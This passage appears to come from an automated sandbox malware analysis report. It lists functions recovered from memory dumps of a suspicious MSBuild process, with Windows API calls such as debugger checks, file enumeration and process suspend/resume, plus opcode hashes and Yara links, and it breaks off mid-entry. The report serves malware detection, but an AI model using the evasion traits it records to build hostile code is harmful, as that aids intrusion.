                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 3906539128-1979702588
                                                                                                                                            • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                                            • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                                                                                                            • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                                            • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                                                                                            Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileFind$FirstH_prologNext
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 301083792-0
                                                                                                                                            • Opcode ID: 829a012926602753b85214bc65812e7bf9034f67f78a7fa4532cc8a33c3093e2
                                                                                                                                            • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                                                                                            • Opcode Fuzzy Hash: 829a012926602753b85214bc65812e7bf9034f67f78a7fa4532cc8a33c3093e2
                                                                                                                                            • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                                                                                            Function 0044D5E9 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .$u;~/
                                                                                                                                            • API String ID: 0-966075249
                                                                                                                                            • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                                                            • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                                                                                                            • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                                                            • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                                                                                                            Function 00447597 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoLocale
                                                                                                                                            • String ID: GetLocaleInfoEx$u;~/
                                                                                                                                            • API String ID: 2299586839-1397266105
                                                                                                                                            • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                            • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                                                                                            • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                            • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                                                                                            Function 100060E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                            • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                            • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                                                            • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                            • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                                                            Function 10004AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                                            • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                            • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                            • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                                            • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                            • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                                            Function 00442554 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 00442575
                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044257C
                                                                                                                                            • ExitProcess.KERNEL32 ref: 0044258E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                            • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                                            • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                                                                                            • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                                            • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                                                                                                            Function 0041ACC1 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACCC
                                                                                                                                            • NtSuspendProcess.NTDLL(00000000), ref: 0041ACD9
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACE2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CloseHandleOpenSuspend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1999457699-0
                                                                                                                                            • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                                            • Instruction ID: f0940f0a464cb9da12e036c8bcda16370f3965740af83b573a45ae51f9acba0f
                                                                                                                                            • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                                            • Instruction Fuzzy Hash: E7D0A733605131638221176A7C0CC87EE6CDFC1EB37024136F404C3220DA30C84186F4
                                                                                                                                            Function 0041ACED Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041ACF8
                                                                                                                                            • NtResumeProcess.NTDLL(00000000), ref: 0041AD05
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD0E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CloseHandleOpenResume
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3614150671-0
                                                                                                                                            • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                                            • Instruction ID: b64f47c6af987b25b68fadd97e6a7e629856a7b738c344dffca8a71896aa998e
                                                                                                                                            • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                                            • Instruction Fuzzy Hash: DFD0A733504132638220176A7C0CC87EDADDFC5EB37024236F404C3621DA34C841C6F4
                                                                                                                                            Function 10006580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .
                                                                                                                                            • API String ID: 0-248832578
                                                                                                                                            • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                            • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                                                                                            • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                            • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                                                                                            Function 004510BA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 1663032902-1979702588
                                                                                                                                            • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                                            • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                                                                                            • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                                            • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                                                                                            Function 00450D42 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                            • String ID: <D
                                                                                                                                            • API String ID: 1084509184-3866323178
                                                                                                                                            • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                                                                            • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                                                                                                            • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                                                                            • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                                                                                                            Function 00450DDD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                            • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                            • String ID: <D
                                                                                                                                            • API String ID: 1084509184-3866323178
                                                                                                                                            • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                                                            • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                                                                                                            • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                                                            • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                                                                                            Function 004470AE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-00471558,?,0044225B,00000000,0046DAC0,0000000C,00442216,0000000A,?,?,00448739,0000000A,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 1272433827-1979702588
                                                                                                                                            • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                                                            • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                                                                                            • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                                                            • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                                                                                            Function 00440E20 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                                                                                                            • Instruction ID: cffdc6bb8eb20f5336ace8b102e865ec7dcfb2cf624fb46ac032ba80a60d6a90
                                                                                                                                            • Opcode Fuzzy Hash: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                                                                                                            • Instruction Fuzzy Hash: 8A024C71E002199BEF14CFA9C9806AEBBF1FF88314F25826AD919E7350D735AD45CB84
                                                                                                                                            Function 0043CE3B Relevance: 2.7, Strings: 2, Instructions: 237COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: u;~/$BG3i@
                                                                                                                                            • API String ID: 0-1333258365
                                                                                                                                            • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                                                                            • Instruction ID: a817909710d0090f483bb13cdd1d1ee80d6dfae79024daed79820ace932836b2
                                                                                                                                            • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                                                                            • Instruction Fuzzy Hash: E361777160070966DA385A2858D6BBF6396EB0DB04F10391BE943FF3C1D61DAD43874E
                                                                                                                                            Function 1000B5C1 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000B5BC,?,?,00000008,?,?,1000B25C,00000000), ref: 1000B7EE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3997070919-0
                                                                                                                                            • Opcode ID: 5385f7ee1153a66eb2669645b58237e3e0719d9079e030963b5c19e75e4dc3f3
                                                                                                                                            • Instruction ID: c899a2dc376e060411cab8954cdd4c29929d9ba6cfa71f030d59b99a2ca162da
                                                                                                                                            • Opcode Fuzzy Hash: 5385f7ee1153a66eb2669645b58237e3e0719d9079e030963b5c19e75e4dc3f3
                                                                                                                                            • Instruction Fuzzy Hash: 0DB16B31610A09CFE755CF28C486B647BE0FF453A4F25C658E89ACF2A5C735E982CB40
                                                                                                                                            Function 004520D2 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004520CD,?,?,00000008,?,?,00455412,00000000), ref: 004522FF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                            • String ID:
